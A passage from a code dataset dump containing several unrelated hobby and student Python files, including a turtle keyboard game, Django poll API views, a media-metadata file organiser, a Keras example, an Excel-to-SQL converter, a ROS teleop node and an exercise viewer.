available in this trinket\r\n\r\n#add the shape first then set the turtle shape\r\n\r\nturtle.shape('turtle')\r\n\r\n#I made the size of the turtle larger\r\nturtle.shapesize(2)\r\n\r\n#I made the color of the turtle dark green with a black outline.\r\nturtle.color(\"black\", \"darkgreen\")\r\n\r\n#Prints the turtle on the screen right when you start the program to show where you began as you move the turtle around the world.\r\nturtle.stamp()\r\n\r\n#I changed the background color to dark khaki.\r\nscreen.bgcolor(\"darkkhaki\")\r\n\r\n#I added the clone method which clones the original turtle.\r\nturtle2 = turtle.clone()\r\n\r\n#I made the color of turtle2 blue with a white outline.\r\nturtle2.color(\"white\", \"blue\")\r\n\r\n#I changed the speed of both turtles to be a little faster.\r\nmove_speed = 20\r\nturn_speed = 20\r\n\r\n#these defs control the movement of our \"turtle\"\r\n\r\n#Changed the name of my method to jakeforward.\r\ndef jakeforward():\r\n turtle.forward(move_speed)\r\n x, y = turtle.position()\r\n\r\n #Changed the if condition from < (less than) sign to <= (less than or equal to) sign. \r\n if not -WIDTH / 2 <= x <= WIDTH / 2 or not -HEIGHT / 2 <= y < HEIGHT / 2:\r\n turtle.undo() # undo error\r\n turtle.left(180) # turn around\r\n turtle.forward(10) # redo movement but in new direction\r\n \r\n#Changed the name of my method to jakebackward.\r\ndef jakebackward():\r\n turtle.backward(move_speed)\r\n x, y = turtle.position()\r\n \r\n#Changed the if condition from < (less than) sign to <= (less than or equal to) sign.\r\n if not -WIDTH / 2 <= x <= WIDTH / 2 or not -HEIGHT / 2 <= y < HEIGHT / 2:\r\n turtle.undo() # undo error\r\n turtle.left(180) # turn around\r\n turtle.forward(10) # redo movement but in new direction\r\n\r\n#Changed the name of my method to jakeleft.\r\ndef jakeleft():\r\n turtle.left(turn_speed)\r\n\r\n#Changed the name of my method to jakeright.\r\ndef jakeright():\r\n turtle.right(turn_speed)\r\n\r\n\r\n#Changed the name of my method to jakeforward2.\r\ndef jakeforward2():\r\n turtle2.forward(move_speed)\r\n x, y = turtle2.position()\r\n\r\n #Changed the if condition from < (less than) sign to <= (less than or equal to) sign. 
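This keeps the boundary check inclusive, so a turtle resting exactly on the window edge is still treated as in bounds.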
\r\n if not -WIDTH / 2 <= x <= WIDTH / 2 or not -HEIGHT / 2 <= y < HEIGHT / 2:\r\n turtle2.undo() # undo error\r\n turtle2.left(180) # turn around\r\n turtle2.forward(10) # redo movement but in new direction\r\n \r\n#Changed the name of my method to jakebackward2.\r\ndef jakebackward2():\r\n turtle2.backward(move_speed)\r\n x, y = turtle2.position()\r\n \r\n#Changed the if condition from < (less than) sign to <= (less than or equal to) sign.\r\n if not -WIDTH / 2 <= x <= WIDTH / 2 or not -HEIGHT / 2 <= y < HEIGHT / 2:\r\n turtle2.undo() # undo error\r\n turtle2.left(180) # turn around\r\n turtle2.forward(10) # redo movement but in new direction\r\n\r\n#Changed the name of my method to jakeleft2.\r\ndef jakeleft2():\r\n turtle2.left(turn_speed)\r\n\r\n#Changed the name of my method to jakeright2.\r\ndef jakeright2():\r\n turtle2.right(turn_speed)\r\n\r\n#Changed penup to pendown so that the turtle's path keeps a trail.\r\nturtle.pendown()\r\nturtle.speed(0)\r\nturtle.home()\r\n\r\n#Changed penup to pendown so that the turtle 2 path keeps a trail.\r\nturtle2.pendown()\r\nturtle2.speed(0)\r\nturtle2.home()\r\n\r\n#now associate the defs from above with certain keyboard events\r\nscreen.onkeypress(jakeforward, \"Up\")\r\n\r\nscreen.onkeypress(jakebackward, \"Down\")\r\nscreen.onkeypress(jakeleft, \"Left\")\r\nscreen.onkeypress(jakeright, \"Right\")\r\n\r\nscreen.onkeypress(jakeforward2, \"w\")\r\n\r\nscreen.onkeypress(jakebackward2, \"s\")\r\nscreen.onkeypress(jakeleft2, \"a\")\r\nscreen.onkeypress(jakeright2, \"d\")\r\nscreen.listen()\r\n","sub_path":"Senior(2018-2019)/Python/Turtle-Methods/10-25-18/Project2.py","file_name":"Project2.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"203698212","text":"from rest_framework import generics, permissions, views\nfrom rest_framework.response import Response\nfrom .models import Question, Choice, Feedback\nfrom .serializers import QuestionSerializer, ChoiceSerializer, FeedbackSerializer\nfrom django.shortcuts import render\n\n\nclass QuestionList(generics.ListCreateAPIView):\n queryset = Question.objects.all()\n #model = Question\n serializer_class = QuestionSerializer\n permission_classes = [\n permissions.AllowAny\n ]\n\nclass QuestionDetail(generics.RetrieveAPIView):\n\tqueryset = Question.objects.all()\n\t#model = Question\n\tserializer_class = QuestionSerializer\n\tlookup_url_kwarg = 'question_pk'\n\tpermission_classes = [\n\t\tpermissions.AllowAny\n\t]\n\nclass ChoiceUpdate(generics.UpdateAPIView):\n\tqueryset = Choice.objects.all()\n\t#model = Choice\n\tserializer_class = ChoiceSerializer\n\tlookup_url_kwarg = 'choice_pk'\n\tpermission_classes = [\n\t\tpermissions.AllowAny\n\t]\n\nclass ChoiceList(generics.ListCreateAPIView):\n queryset = Choice.objects.all()\n #model = Choice\n serializer_class = ChoiceSerializer\n permission_classes = [\n permissions.AllowAny\n ]\n\nclass FeedbackUpdate(generics.UpdateAPIView):\n\tqueryset = Feedback.objects.all()\n\tserializer_class = FeedbackSerializer\n\tlookup_url_kwarg = 'feedback_pk'\n\tpermission_classes = [\n\t\tpermissions.AllowAny\n\t]\n\nclass FeedbackList(generics.ListCreateAPIView):\n queryset = Feedback.objects.all()\n serializer_class = FeedbackSerializer\n permission_classes = [\n permissions.AllowAny\n ]\n\nclass UpvoteApiView(views.APIView):\n\n def post(self, request, *args, **kwargs):\n question = Question.objects.get(id=kwargs['question_pk'])\n if question.upvotes:\n question.upvotes = 
question.upvotes+1\n else:\n question.upvotes = 1\n question.save()\n return Response({\"question\": question.id, \"upvotes\": question.upvotes, \"success\": True})\n\nclass DownvoteApiView(views.APIView):\n\n def post(self, request, *args, **kwargs):\n question = Question.objects.get(id=kwargs['question_pk'])\n if question.upvotes:\n question.upvotes = question.upvotes-1\n else:\n question.upvotes = -1\n question.save()\n return Response({\"question\": question.id, \"upvotes\": question.upvotes, \"success\": True})\n\ndef index(request):\n return render(request, 'polls/index.html')\n","sub_path":"djangular/polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"627808184","text":"import filecmp\nimport os\nimport re\nimport shutil\nimport mutagen\nimport logging\nimport ast\nfrom exiftool import ExifTool\nfrom exiftool import fsencode\nfrom mutagen import asf\nfrom mutagen import mp4\nfrom mutagen.easyid3 import EasyID3\nfrom mutagen.id3 import ID3\nfrom logging.handlers import RotatingFileHandler\nfrom Avatar.get_extensions import GetExtensions\n\n\nclass AvatarFile:\n \"\"\"\n It collects and returns information about a file.\n You will be able to get the type of a file or tags existing within the file.\n Some os functions are incorporated in this module, helping you to delete, rename or move the file\n See \"extension_list.txt\" for a list of extensions accepted\n \"\"\"\n\n def __init__(self, url):\n \"\"\"\n :param url: file url\n \"\"\"\n self.url = url\n self.list_mp3_tag = ['mp3']\n self.list_mp4_tag = ['mp4', 'm4a']\n self.tag_info = {\n 'pdf': {'extension': ('extension', False), 'title': ('PDF:Title', True), 'constructor':\n ('constructor', False), 'size': ('size', False), 'total_ext': ('total_ext', False), 'producer':\n ('PDF:Producer', True), 'resume': ('PDF:Subject', True), 'author': ('XMP:Author', True), 'type':\n ('type', False)}, 'asf_tag': {'subtitle': ('WM/SubTitle', True), 'buffer average':\n ('Buffer Average', True), 'publisher': ('WM/Publisher', True), 'description':\n ('Description', True), 'content distributor': ('WM/ContentDistributor', True), 'period':\n ('WM/Period', True), 'part of set': ('WM/PartOfSet', True), 'director': ('WM/Director', True), 'extension':\n ('extension', False), 'promotion url': ('WM/PromotionURL', True), 'constructor':\n ('constructor', False), 'genres': ('WM/Genre', True), 'parental rating':\n ('WM/ParentalRating', True), 'author url': ('WM/AuthorURL', True), 'producer':\n ('WM/Producer', True), 'artists': ('Author', True), 'conductor': ('WM/Conductor', True), 'beats per minute':\n ('WM/BeatsPerMinute', True), 'title': ('Title', True), 'encoded by': ('WM/EncodedBy', True), 'initial key':\n ('WM/InitialKey', True), 'album title': ('WM/AlbumTitle', True), 'category': ('WM/Category', True),\n 'total_ext': ('total_ext', False), 'copyright': ('Copyright', True), 'size': ('size', False), 'composer':\n ('WM/Composer', True), 'tag': ('Tagg', True), 'type': ('type', False), 'album artist':\n ('WM/AlbumArtist', True)}, 'mp4': {'artists': ('symART', True), 'title': ('symnam', True), 'comment':\n ('symcmt', True), 'total_ext': ('total_ext', False), 'subtitle': ('Subt', True), 'extension':\n ('extension', False), 'constructor': ('constructor', False), 'size': ('size', False), 'composer':\n ('symwrt', True), 'date': ('symday', True), 'genres': ('symgen', True), 'type': ('type', False)}, 'mp3':\n {'disc number': ('discnumber', 
True), 'artists': ('artist', True), 'subtitle':\n ('version', True), 'conductor': ('conductor', True), 'publisher':\n ('organization', True), 'beats per minute': ('bpm', True), 'total_ext': ('total_ext', False), 'encoded by':\n ('encodedby', True), 'type': ('type', False), 'title': ('title', True), 'track number':\n ('tracknumber', True), 'extension': ('extension', False), 'constructor':\n ('constructor', False), 'size': ('size', False), 'composer': ('composer', True), 'date':\n ('date', True), 'genres': ('genre', True), 'author url': ('website', True), 'album':\n ('album', True), 'album artist': ('performer', True)}}\n\n def __eq__(self, other):\n if isinstance(other, AvatarFile):\n return self.get_contain() == other.get_contain()\n else:\n return False\n\n def __ne__(self, other):\n if isinstance(other, AvatarFile):\n return not self.get_contain() == other.get_contain()\n else:\n return True\n\n def __hash__(self):\n return hash(self.get_contain())\n\n def exists(self):\n return os.path.exists(self.url)\n\n def get_types(self):\n \"\"\"\n :return: file extension, file total_ext, file_type, maker\n \"\"\"\n ext_dict = GetExtensions.get_extensions()\n extension = self.get_extension()\n total_ext = ext_dict[self.get_extension()][0]\n file_type = ext_dict[self.get_extension()][2]\n maker = ext_dict[self.get_extension()][1]\n return extension, total_ext, file_type, maker\n\n def get_extension(self):\n return self.url.split('.')[-1].lower()\n\n def is_same(self, file_cmp):\n return filecmp.cmp(self.url, file_cmp)\n\n def move(self, destination):\n \"\"\"\n :param destination: folder url\n \"\"\"\n destination = os.path.join(destination, os.path.basename(self.url))\n destination = control_duplicate_name(destination, 1)\n\n try:\n os.renames(self.url, destination)\n except TypeError as e:\n logger.error(e)\n pass\n\n return destination\n\n def move_by_tag(self, dir_selected, standard):\n \"\"\"\n :param dir_selected: folder destination\n :param standard: how the file should be moved. A string is expected an coma will help to split different value\n example: standard could be 'Genres,Artist,Album'\n \"\"\"\n list_tag = []\n forbidden = [',', ':', '/', '*', '?', '<', '>', '|', '\\\\', '.', '\"']\n\n for element in standard:\n try:\n tag = self.get_tag(element)\n tag = tag[0] if len(tag) == 1 else tag\n for item in forbidden:\n if item in tag:\n tag = str(tag).replace(item, ' ')\n list_tag.append(tag.strip())\n except (TypeError, IndexError) as e:\n logger.info('{}'.format(e))\n logger.info('{file} {tag} Valeur spécifiée non reconnue. 
Un dossier '\n '/correspondant -unknown- sera crée'.format(file=self.get_url(), tag=element))\n list_tag.append('unknown {}'.format(element))\n continue\n\n sub_folders = list_tag\n dir_destination = os.path.join(dir_selected, *sub_folders)\n try:\n self.move(dir_destination)\n except (PermissionError, FileNotFoundError, TypeError) as e:\n logger.error('{}'.format(e))\n\n def move_by_char(self, dir_selected, standard):\n\n forbidden = [',', ':', '/', '*', '?', '<', '>', '|', '\\\\', '.', '\"']\n sub_folders = standard\n dir_destination = os.path.join(dir_selected, *sub_folders)\n for item in forbidden:\n dir_destination = dir_destination.replace(item, ' ')\n dir_destination = dir_destination.strip()\n try:\n self.move(dir_destination)\n except (PermissionError, FileNotFoundError, TypeError) as e:\n logger.error('{}'.format(e))\n\n def rename(self, new_name):\n src_folder = os.path.dirname(self.url)\n new_name = \"{new_name}.{ext}\".format(new_name=new_name, ext=self.get_extension())\n destination = os.path.join(src_folder, new_name)\n destination = control_duplicate_name(destination, 1)\n shutil.move(self.url, destination)\n\n def rename_with_tag(self, tag_list):\n\n value_list = ''\n for tag in tag_list:\n tag_value = self.get_tag(tag)\n value_list = '{value_list} {tag_value}'.format(value_list=value_list, tag_value=tag_value)\n value_list = value_list.strip()\n value = '{tag}.{extension}'.format(tag=value_list, extension=self.get_extension())\n self.rename(value)\n\n def delete(self):\n try:\n os.remove(self.url)\n except PermissionError as e:\n logger.error(e)\n\n def get_name(self):\n return os.path.basename(self.url)\n\n def get_url(self):\n return self.url\n\n def get_tag(self, tag):\n \"\"\"\n :param tag: tag name. Can be metadata like the title of a song a extern data like the type of the file\n :return: tag value\n example: a file corresponding to Bad-Michael Jackson could return \"Michael Jackson\" if the artist name is asked\n \"\"\"\n\n if tag == 'type':\n try:\n return self.get_types()[2]\n except TypeError as e:\n logger.error(e)\n pass\n\n elif tag == 'total_ext':\n try:\n return self.get_types()[1]\n except TypeError as e:\n logger.error(e)\n pass\n\n elif tag == 'constructor':\n try:\n return self.get_types()[3]\n except TypeError as e:\n logger.error(e)\n pass\n\n elif tag == 'extension':\n return self.get_extension()\n\n elif tag == 'size':\n return os.path.getsize(self.url)\n\n else:\n tag = self.translator_get_trad(tag)\n if self.get_extension() == 'mp3':\n try:\n ID3(self.url).update_to_v23()\n file = EasyID3(self.url)\n return file.get(tag)\n except (AttributeError, PermissionError, mutagen.id3._util.ID3NoHeaderError) as e:\n logger.error(e)\n pass\n\n elif self.get_extension() == 'mp4' or self.get_extension() == 'm4a':\n try:\n file = mp4.Open(self.url)\n return file.get(tag)\n except mutagen.mp4.MP4StreamInfoError as e:\n logger.error(e)\n pass\n\n elif self.get_extension() == 'wmv' or self.get_extension() == 'wma':\n file = asf.Open(self.url)\n return file.get(tag)\n\n elif self.get_extension() == 'pdf':\n with ExifTool() as et:\n file = et.get_metadata(self.url)\n return file.get(tag)\n\n def change_tag(self, tag, tag_value):\n \"\"\"\n :param tag: tag name\n :param tag_value: tag value wanted\n change a tag value to another. only intern data can be changed. 
See the documentation for a list of tag expected\n \"\"\"\n\n if self.is_tag_editable(tag):\n tag = self.translator_get_trad(tag)\n if self.get_extension() == 'wmv' or self.get_extension() == 'wma':\n file = asf.Open(self.url)\n file[tag] = tag_value\n try:\n file.save()\n except PermissionError as e:\n logger.error(e)\n\n elif self.get_extension() == 'mp4' or self.get_extension() == 'm4a':\n try:\n file = mp4.Open(self.url)\n file[str(tag)] = tag_value\n file.save()\n except (PermissionError, mutagen.mp4.MP4StreamInfoError, IOError) as e:\n logger.error(e)\n\n elif self.get_extension() == 'mp3':\n try:\n ID3(self.url).update_to_v23()\n ID3(self.url).save()\n file = EasyID3(self.url)\n file[tag] = tag_value\n file.save()\n except (mutagen.id3._util.ID3NoHeaderError, PermissionError, IOError) as e:\n logger.error(e)\n return\n\n elif self.get_extension() == 'pdf':\n with ExifTool() as et:\n params = map(fsencode, ['-' + tag + '=' + \"%s\" % tag_value, '%s' % self.url])\n et.execute(*params)\n\n def get_all_tag(self):\n \"\"\"\n :return: will give a list of tag tuple (tag_name, tag_value) existing in the file\n \"\"\"\n result = []\n try:\n for element in self.translator_accept_tag():\n result.append((element, self.get_tag(element)))\n return result\n except TypeError as e:\n logger.error(e)\n pass\n\n def get_all_tag_keys(self):\n \"\"\"\n :return: will give a key list of existing tags in the file\n \"\"\"\n result = []\n try:\n for element in self.translator_accept_tag():\n result.append(element)\n except TypeError as e:\n logger.error(e)\n pass\n return result\n\n def is_tag_editable(self, tag):\n if self.get_extension() in self.list_mp4_tag:\n return self.tag_info['mp4'][tag][1]\n elif self.get_extension() == 'wma' or self.get_extension() == 'wmv':\n return self.tag_info['asf_tag'][tag][1]\n elif self.get_extension() == 'pdf':\n return self.tag_info['pdf'][tag][1]\n elif self.get_extension() in self.list_mp3_tag:\n return self.tag_info['mp3'][tag][1]\n\n def is_ext_accepted(self):\n \"\"\"\n :return: True if the file has an accepted extension.\n \"\"\"\n\n ext_dict = GetExtensions.get_extensions()\n if self.get_extension() in ext_dict.keys():\n return True\n\n def is_matching_by_size(self, mini, maxi):\n if mini < self.get_tag('size') < maxi:\n return True\n else:\n return False\n\n def is_matching_by_attribute(self, tag_name, tag_value):\n if self.get_tag(tag_name) == tag_value:\n return True\n else:\n return False\n\n def is_matching_by_name(self, value):\n text = value.lower()\n text = text.split(' ')\n text = '.*' + '.*'.join(text) + '.*'\n if re.match(text, self.get_name().lower()):\n return True\n else:\n return False\n\n def is_tag_list_accepted(self, tag_list):\n key = self.get_all_tag_keys()\n for element in tag_list:\n if element not in key:\n return False\n return True\n\n def get_contain(self):\n with open(self.url, 'rb') as contain:\n return contain.read()\n\n def translator_get_trad(self, tag):\n try:\n if self.get_extension() in self.list_mp4_tag:\n if 'sym' in self.tag_info[self.get_extension()][tag][0]:\n return self.tag_info['mp4'][tag][0].replace('sym', '©')\n elif self.get_extension() == 'wma' or self.get_extension() == 'wmv':\n return self.tag_info['asf_tag'][tag][0]\n elif self.get_extension() == 'pdf':\n return self.tag_info['pdf'][tag][0]\n elif self.get_extension() in self.list_mp3_tag:\n return self.tag_info['mp3'][tag][0]\n except KeyError as e:\n logger.error(e)\n \n def translator_accept_tag(self):\n if self.get_extension() in self.list_mp4_tag:\n return 
self.tag_info['mp4']\n elif self.get_extension() == 'wmv' or self.get_extension() == 'wma':\n return self.tag_info['asf_tag']\n elif self.get_extension() == 'pdf':\n return self.tag_info['pdf']\n elif self.get_extension() in self.list_mp3_tag:\n return self.tag_info['mp3']\n\n\ndef control_duplicate_name(name, i):\n\n if os.path.exists(name):\n name_split = name.split('.')\n new_name = '{url_no_ext}-Copie {count}.{ext}'.format(url_no_ext='.'.join(name_split[0:-1]),\n count=i, ext=name_split[-1])\n i += 1\n if os.path.exists(new_name):\n return control_duplicate_name(name, i)\n else:\n return new_name\n else:\n return name\n\nformatter_info = logging.Formatter(\"%(asctime)s -- %(name)s -- %(levelname)s -- %(message)s\")\nlogger = logging.getLogger(\"avatar_file_log\")\nhandler_info = logging.handlers.RotatingFileHandler(\"avatar_file.log\", mode=\"a\", maxBytes=1000000, backupCount=1,\n encoding=\"utf-8\")\nhandler_info.setFormatter(formatter_info)\nlogger.addHandler(handler_info)\nlogger.addHandler(handler_info)\nlogger.setLevel(logging.DEBUG)\n","sub_path":"Avatar/avatar_file.py","file_name":"avatar_file.py","file_ext":"py","file_size_in_byte":16116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"307490074","text":"# 层对象接受张量为参数,返回一个张量。\n# 输入是张量,输出也是张量的一个框架就是一个模型,通过Model定义。\n# 这样的模型可以被像Keras的Sequential一样被训练\nfrom tensorflow.keras.layers import Input, Dense\nfrom tensorflow.keras.models import Model\n\n# This returns a tensor\ninputs = Input(shape=(784,))\n\n# a layer instance is callable on a tensor, and returns a tensor\nx = Dense(64, activation='relu')(inputs)\nx = Dense(64, activation='relu')(x)\npredictions = Dense(10, activation='softmax')(x)\n\n# This creates a model that includes\n# the Input layer and three Dense layers\nmodel = Model(inputs=inputs, outputs=predictions)\nmodel.compile(optimizer='rmsprop',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\nmodel.fit(data, labels) # starts training\n# ----------------------------------------------------\n# # 所有的模型都是可调用的,就像层一样\n# # 利用函数式模型的接口,我们可以很容易的重用已经训练好的模型:\n# # 你可以把模型当作一个层一样,通过提供一个tensor来调用它。\n# # 注意当你调用一个模型时,你不仅仅重用了它的结构,也重用了它的权重。\n# x = Input(shape=(784,))\n# # # This works, and returns the 10-way softmax we defined above.\n# y = model(x)\n# -----------------------------------------------------------\n# # 这种方式可以允许你快速的创建能处理序列信号的模型,\n# # 你可以很快将一个图像分类的模型变为一个对视频分类的模型,只需要一行代码:\n# from tensorflow.keras.layers import TimeDistributed\n\n# # Input tensor for sequences of 20 timesteps,\n# # each containing a 784-dimensional vector\n# input_sequences = Input(shape=(20, 784))\n\n# # This applies our previous model to every timestep in the input sequences.\n# # the output of the previous model was a 10-way softmax,\n# # so the output of the layer below will be a sequence of 20 vectors of size 10.\n# processed_sequences = TimeDistributed(model)(input_sequences)","sub_path":"keras/functional-example/full-connect-net.py","file_name":"full-connect-net.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"547216610","text":"#!/usr/bin/env python3\nimport re\nimport datetime\nimport openpyxl\nimport sqlescapy\nimport logging\nimport time\n\nkezd = time.time()\n\nlogging.basicConfig(level=logging.DEBUG, format=' %(asctime)s - %(message)s')\nlogging.disable(logging.DEBUG) # Akkor kell ha már nem akarunk Debuggolni. 
:-)\nlogging.disable(logging.INFO)\nlogging.info('Program elkezdődött.')\n\nbem = \"../xlsxs/2021. AUTENTIKUS.xlsx\"\nkim = \"../sql/2021_Autentikus.sql\"\nsql = ''\nhonapok = ['JANUÁR', 'FEBRUÁR', 'MÁRCIUS', 'ÁPRILIS', 'MÁJUS',\n 'JÚNIUS', 'JÚLIUS', 'AUGUSZTUS', 'SZEPTEMBER', 'OKTÓBER',\n 'NOVEMBER', 'DECEMBER']\nf = open(kim, 'w', encoding='utf8')\nf.write('# Honvédelmi adatok 2021-re az autentikusból\\n')\nf.write('# Készítette: Konta Boáz (kontab6@gmail.com).\\n')\nf.write('USE honved2;\\n')\nprint('Bemeneti fájl: ' + bem)\nprint('Kimenetei fájl: ' + kim)\nwb = openpyxl.load_workbook(filename=bem, read_only=True)\n# read_only elvileg gyorsabb és amúgy sem akarunk írni bele.\nfor sh in wb.worksheets: # Végigmegyünk a munkafüzet lapjain\n cells = sh['A2':'I210'] # I210 a vége\n i = 0\n ''' Az értékek a következők:\n c1 - Dátum ( óraperc nélkül )\n c2 - Tánckar és Zenekar\n c3 - Zenekar önálló\n c4 - Férfikar\n c5 - Közreműködők egyeztetés alatt\n c6 - Kontakt\n c7 - Státusz\n c8 - Külsős szállítás\n c9 - megjegyzés\n Ezek a 2021_AUTENTIKUS.xlsx táblázat fejlécsorának összetevői.\n Továbbá! Közhírré tétetik!\n Az excel fileban a dátum mezőt tessék rendesen beállítani.\n '''\n print(\"Munkalap neve: \", sh.title)\n for c1, c2, c3, c4, c5, c6, c7, c8, c9 in cells:\n if c1.value and c2.value: # dátum tánckar kitöltve\n if isinstance(c1.value, datetime.date):\n print('Ejsze, egyszer aztán igen léfutottam he.')\n d = c1.value.strftime('%Y-%m-%d') # d = datum\n elif c1.value not in honapok:\n d = c1.value[0:6].replace(' ', '')\n d = d[0:5].replace('.', '-')\n logging.info('Ezek az érdekes dátumok: {}'.format(d))\n # d = c1.value[0:6].replace('.', '-')\n d = '2021-' + d.strip()\n # ha string => .->- és marad az első 10 karakter\n logging.debug('Datum mező:{} , típusa:{} '.format(d, type(d)))\n logging.debug('''Változók értéke:\n Dátum: {}\n Tánc: {}\n Zkr: {}\n FFikar: {}\n Egyeztet: {}\n Kontakt: {}\n Státusz: {}\n Külszáll: {}\n Megjegy: {}'''\n .format(c1.value, c2.value, c3.value, c4.value, c5.value, c6.value, c7.value, c8.value,\n c9.value))\n sql = \"INSERT INTO aut (sorsz,datum,ceg,kezd,hely,musor,kontakt,megjegyzes,helykod) VALUES ( NULL,\"\n c2db = c2.value.split('/') # A 0 az időpont/helyszín, az 1 pedig a műsor.\n idopont = re.match('[0-9][0-9].?[0-9][0-9]', c2db[0])\n try:\n c2db[1] = c2db[1].strip()\n musor = sqlescapy.sqlescape(c2db[1])\n # musor = re.escape(c2db[1])\n except IndexError:\n musor = 'Nincs megadva műsor.'\n logging.debug('IndexError - Nincs megadva műsor.')\n if idopont:\n logging.debug('Van időpont!')\n # kezdes = c1.value.replace(hour=int(idopont.group()[:2]), minute=00)\n kezdes = idopont.group()\n hely = c2db[0].replace(kezdes, '', 1)\n hely = hely.strip()\n # ely elejéről levesszük a spacet\n logging.debug('Helyszín eredménye: ' + hely)\n else:\n kezdes = 'Nincs megadva kezdés.'\n hely = c2db[0]\n logging.debug('Kezdés eredménye: ' + hely)\n # kezdes = c1.value.replace(hour=00, minute=00)\n if c8.value:\n kontakt = c8.value\n else:\n kontakt = ''\n if c9.value:\n megjegyzes = c9.value\n else:\n megjegyzes = ''\n datum = d\n logging.debug('Kezdési időpont kialakult: ' + str(kezdes))\n sql += '\"'\n sql += str(datum) # Dátum\n sql += '\",'\n sql += '\"24\",\"' # Cég\n sql += kezdes # Kezdes\n sql += '\",\"'\n sql += hely.strip() # Hely\n sql += '\",\"'\n sql += musor.strip() # Musor\n sql += '\",\"'\n sql += kontakt.strip() # Kontakt\n sql += '\",\"'\n sql += megjegyzes.strip() # Megjegyzés\n sql += '\",\"'\n sql += str(0) # helykod\n sql += '\");\\n'\n 
logging.debug(sql)\n f.write(sql)\n i = i + 1 # feldolgozott sorok száma.\n print('{} sor feldolgozva.'.format(i))\nf.close()\nprint('Fájl kiírása befejezve.')\nveg = time.time() - kezd\nprint('{:.5f}. sec alatt lefutott'.format(veg))\n","sub_path":"aut/python/2021_1_sql.py","file_name":"2021_1_sql.py","file_ext":"py","file_size_in_byte":5586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"575525342","text":"#!/usr/bin/env python\n# Software License Agreement (BSD License)\n#\n# Copyright (c) 2008, Willow Garage, Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n\nimport keyboard # using module keyboard\nimport rospy\nfrom geometry_msgs.msg import Twist\n\ndef controlador_robo():\n\n rospy.init_node('controlador_robo')\n\n pub = rospy.Publisher('cmd_vel_mux/input/teleop', Twist, queue_size=10)\n vel_twist = Twist()\n rate = rospy.Rate(10)\n\n k_lin = 1\n k_ang = 0.7\n\n while True:\n vel_linear = 0\n vel_angular = 0\n key_pressed = False\n try:\n if keyboard.is_pressed('up'):\n key_pressed = True\n vel_linear += 1\n if keyboard.is_pressed('down'):\n key_pressed = True\n vel_linear -= 1\n if keyboard.is_pressed('left'):\n key_pressed = True\n vel_angular += 1\n if keyboard.is_pressed('right'):\n key_pressed = True\n vel_angular -= 1\n\n if key_pressed:\n vel_twist.linear.x = vel_linear * k_lin\n vel_twist.angular.z = vel_angular * k_ang\n pub.publish(vel_twist)\n except:\n break\n rate.sleep()\n\n\nif __name__ == '__main__':\n try:\n controlador_robo()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"src/controlador_robo.py","file_name":"controlador_robo.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"647285468","text":"\r\n\r\n'''\r\nList all questions and hints from 100exercises.txt\r\n\r\nThe file is a bit of a mess, so it's not easy to split it.\r\n3.\tQuestions\r\n\r\nQuestions are divided by #-----\r\nSometimes end with #---\r\nThey should contain:\r\nQuestion:\r\nHints:\r\nExample:\r\nSolution:\r\n'''\r\n\r\nfilename = '100exercises.txt'\r\nallquestions = []\r\n\r\ndef main():\r\n start = False\r\n question = []\r\n with open(filename ,'r') as f:\r\n for line in f:\r\n if not start:\r\n if '3.\tQuestions' in line:\r\n #start here:\r\n start = True\r\n else:\r\n if '#--------------------' in line:\r\n if len(question) >2:\r\n allquestions.append(question)\r\n question = []\r\n else:\r\n line = line.strip()\r\n if len(line) > 2:\r\n question.append(line)\r\n\r\n while True:\r\n sel = input('Pick a question number (1,{})or (q)uit: '.format(len(allquestions)))\r\n if sel == 'q':\r\n exit()\r\n else:\r\n try:\r\n val = int(sel)-1\r\n result = getQuestion(val)\r\n playQuestion(result)\r\n except ValueError:\r\n print(\"That's not an int!\")\r\n \r\n \r\ndef playQuestion(question):\r\n while True:\r\n print('(q)uestion, (h)int, (e)xample, (s)olution, (a)ll, e(x)it')\r\n sel = input('Pick one: ')\r\n if sel == 'q':\r\n printPart(question,'Question:')\r\n elif sel == 'h':\r\n printPart(question,'Hints:')\r\n elif sel == 'e':\r\n printPart(question,'Example:')\r\n elif sel == 's':\r\n printPart(question,'Solution:')\r\n elif sel == 'a':\r\n printQuestion(question)\r\n elif sel == 'x':\r\n return\r\n \r\ndef printPart(question,part):\r\n try:\r\n mypart = question[part]\r\n print()\r\n print(part)\r\n for l in mypart:\r\n print(l)\r\n print()\r\n except KeyError:\r\n 
print('{} missing'.format(part))\r\n\r\ndef printQuestion(question) :\r\n for k,v in question.items():\r\n print(k)\r\n for l in v:\r\n print(l)\r\n print(\"--\")\r\n\r\ndef getQuestion(q_number):\r\n if q_number > len(allquestions):\r\n return False\r\n q = allquestions[q_number]\r\n\r\n list_block_titles = ['Question:','Hints:','Example:','Solution:']\r\n myblock = []\r\n\r\n question = {} \r\n block_name = 'noname'\r\n for line in q:\r\n # https://stackoverflow.com/questions/3389574/check-if-multiple-strings-exist-in-another-string\r\n match = next((x for x in list_block_titles if x in line), False)\r\n if match:\r\n question[block_name] = myblock\r\n block_name = match\r\n myblock = []\r\n else:\r\n myblock.append(line)\r\n question[block_name] = myblock\r\n\r\n return question\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","sub_path":"easylist.py","file_name":"easylist.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"364674947","text":"from common.tree import TreeNode, deserialize_tree, draw_tree\n\n\nclass Solution(object):\n def sortedArrayToBST(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n\n ACE\n\n creates different solution where subtrees favor adding to the right\n \"\"\"\n def helper(a, lo, hi):\n if hi < lo:\n return None\n mid = (lo + hi) // 2\n node = TreeNode(a[mid])\n node.left = helper(a, lo, mid - 